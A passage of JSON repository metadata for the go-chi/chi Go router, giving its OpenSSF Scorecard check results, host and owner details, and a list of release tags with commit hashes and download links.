fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1